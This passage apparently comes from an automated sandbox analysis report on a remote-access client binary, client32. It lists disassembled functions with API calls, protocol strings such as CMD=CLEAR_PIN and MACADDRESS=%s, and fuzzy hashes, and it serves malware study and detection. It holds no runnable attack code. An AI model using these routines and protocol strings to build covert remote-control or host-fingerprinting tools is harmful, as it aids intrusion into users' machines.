                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
                                                                                                                                        • GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
                                                                                                                                        • _fputs.LIBCMT ref: 1101F313
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                                        • String ID: ChatPath$X
                                                                                                                                        • API String ID: 2661292734-3955712077
                                                                                                                                        • Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                        • Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
                                                                                                                                        • Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                        • Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91
                                                                                                                                        Function 688F70F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 124COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$_free_memmove
                                                                                                                                        • String ID: MSG$SENDER
                                                                                                                                        • API String ID: 3114187808-3313591108
                                                                                                                                        • Opcode ID: 21ae85002aa0165152030598d53187be95bda16f2e640fd0c38c60808e7fbd07
                                                                                                                                        • Instruction ID: a0c2d3b3ee04a84256c76a3048c02ac6fb613f5bd16ef0d42e502a1a9db9caa0
                                                                                                                                        • Opcode Fuzzy Hash: 21ae85002aa0165152030598d53187be95bda16f2e640fd0c38c60808e7fbd07
                                                                                                                                        • Instruction Fuzzy Hash: 18416371D04228ABEB20EB688C01BAEB7F4BB55314F9481D9E45CA7240EF319A95CF95
                                                                                                                                        Function 68905C90 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68905CBF
                                                                                                                                          • Part of subcall function 689033A0: wsprintfA.USER32 ref: 689034FD
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                                                        • String ID: 305090$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
                                                                                                                                        • API String ID: 2968883096-3209596228
                                                                                                                                        • Opcode ID: 92a5ca89cc78a6e9e8ef6ab4893d89530e569d15430060d8b4a2675a95013691
                                                                                                                                        • Instruction ID: 895f67c1284a37fc5b5a6b06dcd6baacafd86fa21f96ca611e48c8aa822c563f
                                                                                                                                        • Opcode Fuzzy Hash: 92a5ca89cc78a6e9e8ef6ab4893d89530e569d15430060d8b4a2675a95013691
                                                                                                                                        • Instruction Fuzzy Hash: 9E315675D10228ABDB20DB78DC41FEE77B8EB88214F9086D9E50DE7181EF319A458F60
                                                                                                                                        Function 688F6CC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F6D0A
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F6D72
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,688FB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 688F6DCC
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,000000C8,7622E010,?,688FB586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 688F6DD6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                        • API String ID: 199729137-1434219782
                                                                                                                                        • Opcode ID: aac37bb7a8ce3dfe24ec4a71043cafa7fbfef28fe0b59c602f4de8e733ceff5c
                                                                                                                                        • Instruction ID: 11bbf9a16718f1d5bbdbf981d2cc8405d7dd7706282414ca751352aa3d09c83e
                                                                                                                                        • Opcode Fuzzy Hash: aac37bb7a8ce3dfe24ec4a71043cafa7fbfef28fe0b59c602f4de8e733ceff5c
                                                                                                                                        • Instruction Fuzzy Hash: 0E319C75A082A99FDB20EF58CC80AE9B3B4FB49345F5049B9EA89D7201C6719DC5CF50
                                                                                                                                        Function 688FB8E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _strtok.LIBCMT ref: 688FB941
                                                                                                                                        • _free.LIBCMT ref: 688FB952
                                                                                                                                        • _malloc.LIBCMT ref: 688FB970
                                                                                                                                        • _free.LIBCMT ref: 688FB999
                                                                                                                                        • _strtok.LIBCMT ref: 688FB9A5
                                                                                                                                          • Part of subcall function 68907F80: _memset.LIBCMT ref: 68907F9F
                                                                                                                                          • Part of subcall function 68907F80: LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,688FB916,?,00000100,00000006,00000001), ref: 68907FAC
                                                                                                                                          • Part of subcall function 68907F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68907FCB
                                                                                                                                          • Part of subcall function 68907F80: _malloc.LIBCMT ref: 68907FFB
                                                                                                                                          • Part of subcall function 68907F80: wsprintfA.USER32 ref: 6890807C
                                                                                                                                          • Part of subcall function 68907F80: _free.LIBCMT ref: 68908110
                                                                                                                                          • Part of subcall function 68907F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 6890811C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
                                                                                                                                        • String ID: MACADDRESS=%s
                                                                                                                                        • API String ID: 905297018-795797190
                                                                                                                                        • Opcode ID: 05e87ec95422d81ef61765ac427e67edf67ff2da72bd1490bc9a7f900ede9426
                                                                                                                                        • Instruction ID: 88154e1a93801641de259d8f9a92ac5da742b680d8a5960200e2b950c21b53c1
                                                                                                                                        • Opcode Fuzzy Hash: 05e87ec95422d81ef61765ac427e67edf67ff2da72bd1490bc9a7f900ede9426
                                                                                                                                        • Instruction Fuzzy Hash: 7C219B76B4821937D71092785C45FFA72BC8FA6754FC005A4ED945B280FA72D90682D0
                                                                                                                                        Function 688FBC60 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        • _free.LIBCMT ref: 688FBCBA
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FBCEC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
                                                                                                                                        • API String ID: 3180605519-731630419
                                                                                                                                        • Opcode ID: 4a37c99e00abc95d339f40d9c38ec0fb37575e44eeca6e10e6917d404323fc25
                                                                                                                                        • Instruction ID: 1f10e47900d5b56420f2cf345f60e70d3fdffb78768062e2c617cced27713e14
                                                                                                                                        • Opcode Fuzzy Hash: 4a37c99e00abc95d339f40d9c38ec0fb37575e44eeca6e10e6917d404323fc25
                                                                                                                                        • Instruction Fuzzy Hash: 802181BA900208BBDB00DBA8CC41FFF777C9F94614F808918AA15B7144EB31EA05C7E1
                                                                                                                                        Function 688FAEA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FAF0A
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FAF39
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
                                                                                                                                        • String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
                                                                                                                                        • API String ID: 1628406020-2994292602
                                                                                                                                        • Opcode ID: 8a9499ee2ef28a037206f656659381a5d4f23bba0a59837185464dbccc275124
                                                                                                                                        • Instruction ID: e16a52dae8fc4f6add9a0662b3ed6ed4f7f6b3d42218f5107f1b6102d189f99a
                                                                                                                                        • Opcode Fuzzy Hash: 8a9499ee2ef28a037206f656659381a5d4f23bba0a59837185464dbccc275124
                                                                                                                                        • Instruction Fuzzy Hash: 30216A7A900128BBCB11DBE8CC41FFF7B7C9B95658F904948A601A7244EB35EA46C7E4
                                                                                                                                        Function 688FC280 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FC2CA
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: DT=%I64u$FLG=%d$ID=%d$MAX=%d$UID=%s
                                                                                                                                        • API String ID: 3180605519-2720776842
                                                                                                                                        • Opcode ID: 21ce4965c820d9279fe7eac8f3b702917cc07774c5a89b41146408ab95961282
                                                                                                                                        • Instruction ID: 127b3d35bfdba224d9427cfe31db385122154ffdc3b83d454f9b05a32a6f35ea
                                                                                                                                        • Opcode Fuzzy Hash: 21ce4965c820d9279fe7eac8f3b702917cc07774c5a89b41146408ab95961282
                                                                                                                                        • Instruction Fuzzy Hash: CB11A5B99406247FE7129A59DC80F7B73BCDFA2568B804419FC2897A12EB31E901C6F5
                                                                                                                                        Function 68917A09 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 68917960
                                                                                                                                          • Part of subcall function 6891F4BC: __mtinitlocknum.LIBCMT ref: 6891F4D2
                                                                                                                                          • Part of subcall function 6891F4BC: __amsg_exit.LIBCMT ref: 6891F4DE
                                                                                                                                          • Part of subcall function 6891F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,68916E81,0000000D), ref: 6891F4E6
                                                                                                                                        • InterlockedDecrement.KERNEL32(00000000), ref: 68917972
                                                                                                                                        • _free.LIBCMT ref: 68917987
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • __lock.LIBCMT ref: 689179A0
                                                                                                                                        • ___removelocaleref.LIBCMT ref: 689179AF
                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 689179C8
                                                                                                                                        • _free.LIBCMT ref: 689179E5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 556454624-0
                                                                                                                                        • Opcode ID: 8fac9bf5ca8ae03ecb128f57d8426189594e88e3e74b75d74e45fb3a97aa29b2
                                                                                                                                        • Instruction ID: 1698d323b68ae355001a2bb28957c350869c7e31eb65ea76688d9b98273e0104
                                                                                                                                        • Opcode Fuzzy Hash: 8fac9bf5ca8ae03ecb128f57d8426189594e88e3e74b75d74e45fb3a97aa29b2
                                                                                                                                        • Instruction Fuzzy Hash: 64118C3154DB1EBBEB209F68C544B6E73B89B10728FE04519E4F9DB1D8DB38C984C690
                                                                                                                                        Function 6892870E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                                                        • String ID: throw(
                                                                                                                                        • API String ID: 168861036-3159766648
                                                                                                                                        • Opcode ID: a28d8e99d1c9aaeced55d56f278b424e619e90f236f0a5c781ae1f345f47418b
                                                                                                                                        • Instruction ID: d98aace9656fae59f53ae4de4accc7f586041590b8b1e35e35a492928c6af089
                                                                                                                                        • Opcode Fuzzy Hash: a28d8e99d1c9aaeced55d56f278b424e619e90f236f0a5c781ae1f345f47418b
                                                                                                                                        • Instruction Fuzzy Hash: 22015275A60109EFCF18DFA4C865DFE7BB9EB9930CF804054B511BB299DB30E9458B84
                                                                                                                                        Function 68916E37 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,689372D8,00000008,68916F3F,00000000,00000000), ref: 68916E48
                                                                                                                                        • __lock.LIBCMT ref: 68916E7C
                                                                                                                                          • Part of subcall function 6891F4BC: __mtinitlocknum.LIBCMT ref: 6891F4D2
                                                                                                                                          • Part of subcall function 6891F4BC: __amsg_exit.LIBCMT ref: 6891F4DE
                                                                                                                                          • Part of subcall function 6891F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,68916E81,0000000D), ref: 6891F4E6
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 68916E89
                                                                                                                                        • __lock.LIBCMT ref: 68916E9D
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 68916EBB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                        • String ID: KERNEL32.DLL
                                                                                                                                        • API String ID: 637971194-2576044830
                                                                                                                                        • Opcode ID: 32984d81f5d6ad6c06d7b454de2e1c7955502f16114b154a5020b8fd56be0590
                                                                                                                                        • Instruction ID: 47c5a01e593d9bde7b022498d459a27f7305b9987287ab06eff3f5c97242ba7e
                                                                                                                                        • Opcode Fuzzy Hash: 32984d81f5d6ad6c06d7b454de2e1c7955502f16114b154a5020b8fd56be0590
                                                                                                                                        • Instruction Fuzzy Hash: 9A017C7590CB14DFDB218F65C44535ABBE0AF61328F90890ED5D6A23A0CBB4E540CB54
                                                                                                                                        Function 6891A1B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 6891A1D4
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __getptd.LIBCMT ref: 6891A1E5
                                                                                                                                        • __getptd.LIBCMT ref: 6891A1F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
